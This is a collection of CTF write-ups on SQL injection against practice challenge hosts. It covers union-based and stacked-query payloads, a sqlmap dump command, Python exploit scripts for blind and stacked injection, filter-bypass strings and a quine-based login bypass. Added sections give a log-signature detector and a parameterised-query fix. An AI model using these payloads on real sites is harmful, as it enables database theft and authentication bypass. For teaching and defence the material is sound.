Web Fundamentals: SQL Injection Summary

Challenges

[suctf 2019]EasySQL

This challenge is rather abstract. The intended solution is to guess, from the output being printed piece by piece in the form "Array([?]=>?)", that there is a "||" operator, and then to change sql_mode so that "||" becomes the string-concatenation operator.

The actual backend statement is:

```sql
select $post['query']||flag from Flag
```

exp:

```python
import requests

# Stacked query: switch sql_mode so that || is the string-concatenation
# operator, then the backend's select ...||flag from Flag returns the flag.
payload1 = {'query': '1;set sql_mode=PIPES_AS_CONCAT;select 1'}
response1 = requests.post('http://node4.anna.nssctf.cn:28128/', data=payload1)
print(response1.text[-47:-2])
```

Note that the final "1" cannot be replaced by a letter, otherwise it would be concatenated with the string "flag"; here it means that "1" and "flag" are queried separately.

[SWPUCTF 2021 新生赛]erro

```shell
sqlmap -u http://node4.anna.nssctf.cn:28961/index.php?id=1 -D test_db -T test_tb -C flag --dump
```

[SWPUCTF 2021 新生赛]sql

Find the number of columns:

```text
http://node4.anna.nssctf.cn:28915/?wllm=1'order/**/by/**/3%23
http://node4.anna.nssctf.cn:28915/?wllm=1'order/**/by/**/3%23
```

Find the echo columns: when wllm is 1 the returned result is not displayed, so use -1, which matches nothing, and find which columns of the select are displayed:

```text
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,3%23
```

Dump the database name:

```text
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,database()%23
```

Dump the table names:

```text
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
```

Dump the column names:

```text
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'%23
```

Dump the flag:

```text
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23
```

Only 20 characters are shown at a time, so slice the result and output it piece by piece:

```text
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/test_db.LTLT_flag%23
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),40,20)/**/from/**/test_db.LTLT_flag%23
```
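From the defender's side, every request in this section lands in the web server's access log as a GET with the payload in the query string. The detector below is an added example, not part of the write-up: it URL-decodes each logged request, collapses the /**/ comments that stand in for spaces, and flags the keyword sequences the payloads above depend on. The log lines are constructed samples and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not real traffic): the request shapes
# mirror the /?wllm= URLs above, with one benign request mixed in.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?wllm=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?wllm=1'order/**/by/**/3%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?wllm=-1'union/**/select/**/1,2,database()%23 HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables%23 HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=union+station+hotels HTTP/1.1" 200 2048
""".strip()

# Signature names are my own; the patterns are the keyword sequences the
# write-up's payloads rely on, matched after normalisation.
SIGNATURES = [
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-based column echo", re.compile(r"\bunion\s+select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("row aggregation", re.compile(r"\b(?:group_concat|mid)\s*\(", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')

def normalise(query: str) -> str:
    """URL-decode, then collapse /**/ comments to one space (how MySQL reads
    them), so the regexes see 'union select' as the engine does."""
    decoded = unquote_plus(query)
    return re.sub(r"/\*.*?\*/", " ", decoded)

def scan_line(line: str) -> list:
    """Names of the signatures that fire on one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    text = normalise(urlsplit(m.group(1)).query)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def scan_log(log: str) -> dict:
    """Map 1-based line numbers of suspicious requests to the signatures hit."""
    hits = {}
    for n, line in enumerate(log.splitlines(), start=1):
        names = scan_line(line)
        if names:
            hits[n] = names
    return hits

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(names)}")
```

The benign "union station hotels" search on the last line is not flagged because the signatures require the full keyword sequence after decoding, not a single word.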

[LitCTF 2023]这是什么?SQL !注一下 !

sqlmap

[强网杯 2019]随便注

Stacked injection. select is filtered, so use handler instead; the syntax is:

```sql
handler xxx open;
handler xxx read first;
handler xxx read next;
handler xxx read next [where ...];
handler xxx close;
```

payload:

```text
http://node4.anna.nssctf.cn:28703/?inject=1';show+databases;#
http://node4.anna.nssctf.cn:28703/?inject=1';show+tables+from+supersqli;#
http://node4.anna.nssctf.cn:28703/?inject=1';show+columns+from+`1919810931114514`;#
http://node4.anna.nssctf.cn:28703/?inject=1';handler+`1919810931114514`+open+as+`a`;handler+`a`+read+next;#
```

[CISCN 2019华北Day2]Web1

Boolean-based blind injection; brute-force it directly.

```python
import string, requests

res = ""
url = "http://node4.anna.nssctf.cn:28385/index.php"
# One character position at a time: the page contains "Hello" only when
# the guessed ASCII value of that position is correct.
for i in range(1, 60):
    for j in string.printable:
        sql = 'if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)'.format(i, ord(j))
        post = {"id": sql}
        result = requests.post(url=url, data=post)
        if 'Hello' in result.text:
            res += j
            print(res)
            break  # position i is known, move on to the next one
```

[SWPUCTF 2022 新生赛]ez_sql

POST:

```text
nss=1 #correct echo
nss=2 #wrong, no echo
nss=1'and 1=1# #and is filtered
nss=1'aandnd 1=1# #spaces are filtered
nss=1'aandnd/**/1=1# #correct echo
nss=1'group/**/by/**/3# #3 columns
nss=1'group/**/by/**/4# #4 columns
nss=1'uniunionon/**/select/**/1,database(),2# #union bypass; the injected data is dropped as expected
nss=2'uniunionon/**/select/**/1,database(),2# #shows the current database name
nss=2'uniunionon/**/select/**/1,2,group_concat(schema_name)from/**/infoorrmation_schema.schemata# #dump all database names; or is filtered
nss=2'uniunionon/**/select/**/1,2,group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'# #dump table names
nss=2'uniunionon/**/select/**/1,2,group_concat(column_name)from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'# #dump column names
nss=2'uniunionon/**/select/**/1,Secr3t,flll444g/**/from/**/NSS_tb# #dump the flag
```
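The responses above imply a filter that deletes each blacklisted word once, which is why "uniunionon" and "aandnd" survive as "union" and "and". The code below is an added example, not the challenge's source: it reconstructs that filter as an assumption, shows why repeating it is not a fix either, and puts the parameterised lookup that actually removes the problem beside it, on a constructed SQLite stand-in for NSS_tb.

```python
import re
import sqlite3

# Hypothetical reconstruction (my assumption, not the challenge's code) of the
# filter the responses above imply: each blacklisted token is deleted once.
BLACKLIST = ["union", "and", "or", " "]

def naive_filter(value: str) -> str:
    """Single-pass deletion: 'uniunionon' loses its inner 'union' and the
    surviving halves join back into 'union'; likewise 'aandnd' -> 'and'."""
    for word in BLACKLIST:
        value = re.sub(re.escape(word), "", value, flags=re.I)
    return value

def recursive_filter(value: str) -> str:
    """Repeat until stable. This closes the doubling trick, but the filter
    still mangles ordinary input (see 'password' below), so it is no fix."""
    while True:
        stripped = naive_filter(value)
        if stripped == value:
            return stripped
        value = stripped

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for NSS_db.NSS_tb; the flag value is a placeholder."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NSS_tb (id INTEGER, Secr3t TEXT, flll444g TEXT)")
    conn.execute("INSERT INTO NSS_tb VALUES (1, 'public row', 'FLAG{placeholder}')")
    return conn

def safe_lookup(conn: sqlite3.Connection, nss: str) -> list:
    """The actual fix: bind the value as a parameter, so no blacklist is needed
    and the whole string, quotes and comments included, is compared as data."""
    cur = conn.execute("SELECT id, Secr3t FROM NSS_tb WHERE id = ?", (nss,))
    return cur.fetchall()

if __name__ == "__main__":
    probe = "2'uniunionon/**/select/**/1,database(),2#"
    print(naive_filter(probe))       # the keyword is back: 2'union/**/select/**/...
    print(naive_filter("password"))  # collateral damage: passwd
    db = make_db()
    print(safe_lookup(db, "1"), safe_lookup(db, probe))  # [(1, 'public row')] []
```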

[湖湘杯 2021 final]Penetratable

First register an arbitrary account and log in; there is a change-password function.

Change the password and capture the request:

```http
POST /?c=user&m=updateUserInfo HTTP/1.1
Host: node4.anna.nssctf.cn:28164
Content-Length: 107
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://node4.anna.nssctf.cn:28164
Referer: http://node4.anna.nssctf.cn:28164/?c=user
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1725266993,1725435661,1725519629,1725587320; HMACCOUNT=8A997F8B48BDDC21; PHPSESSID=292c7eacfa77acdca11945bf5aec2fd2; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1725587739
Connection: keep-alive

name=TTE%3D&newPass=81b073de9370ea873f548e31b8adc081&oldPass=81dc9bdb52d04dc20036dbd8313ed055&saying=TTE%3D
```

The username and the slogan look like Base64; the new and old passwords look like MD5.

[第五空间 2021]yet_another_mysql_injection

Quine injection:

```php
<?php
include_once("lib.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
alertMes('hacker', 'index.php');
}
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
$username=$_POST['username'];
$password=$_POST['password'];
if ($username !== 'admin') {
alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
die($FLAG);
} else {
alertMes("wrong password",'index.php');
}
}

if(isset($_GET['source'])){
show_source(__FILE__);
die;
}
?>
<!-- /?source -->
<html>
<body>
<form action="/index.php" method="post">
<input type="text" name="username" placeholder="账号"><br/>
<input type="password" name="password" placeholder="密码"><br/>
<input type="submit" / value="登录">
</form>
</body>
</html>
```

In short, the goal is to control the SQL result so that it equals the input. Quine injection works as follows:

For example, if the distinction between single and double quotes is ignored, the following statement returns itself as its result:

```sql
SELECT REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');
```

After a few more modifications, the result of the following statement is exactly equal to the statement itself:

```sql
SELECT REPLACE(REPLACE('REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")',CHAR(34),CHAR(39)),CHAR(46),'REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")');
```
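To see why the second form is a fixed point and the first is only one "up to quotes", here are the two REPLACE steps carried out in Python on the same strings. This is an added example, not part of the write-up; the function names are mine.

```python
# Helper with MySQL REPLACE() semantics: every occurrence, scanning left to right.
def mysql_replace(s: str, old: str, new: str) -> str:
    return s.replace(old, new)

# First form on the page: REPLACE('body',CHAR(46),'body'), no quote fix-up.
def build_single(body: str) -> str:
    return f"REPLACE('{body}',CHAR(46),'{body}')"

def evaluate_single(body: str) -> str:
    return mysql_replace(body, chr(46), body)          # CHAR(46) is '.'

# Second form: the inner REPLACE(...,CHAR(34),CHAR(39)) turns the double
# quotes inside the body back into the single quotes the outer SQL uses,
# so the substituted text quotes its string literals exactly as written.
def build_quine(body: str) -> str:
    return f"REPLACE(REPLACE('{body}',CHAR(34),CHAR(39)),CHAR(46),'{body}')"

def evaluate_quine(body: str) -> str:
    step1 = mysql_replace(body, chr(34), chr(39))      # " -> '
    return mysql_replace(step1, chr(46), body)         # fill each '.' with the body

def is_fixed_point(body: str) -> bool:
    """True when SELECT build_quine(body) returns exactly build_quine(body)."""
    return evaluate_quine(body) == build_quine(body)

SINGLE_BODY = 'REPLACE(".",CHAR(46),".")'
QUINE_BODY = 'REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")'

if __name__ == "__main__":
    print(evaluate_single(SINGLE_BODY) == build_single(SINGLE_BODY))  # False
    print(is_fixed_point(QUINE_BODY))                                  # True
```

The login code above grants access whenever the row returned by the query equals the submitted password byte for byte, which is exactly what a fixed point produces; an authentication routine should bind the username as a query parameter and compare a stored hash with password_verify(), never compare a query result against raw input.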

The payload for this challenge is:

```text
username=admin&password=1'/**/union/**/select(REPLACE(REPLACE('"/**/union/**/select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!"))#',CHAR(34),CHAR(39)),CHAR(33),'"/**/union/**/select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!"))#'))#
```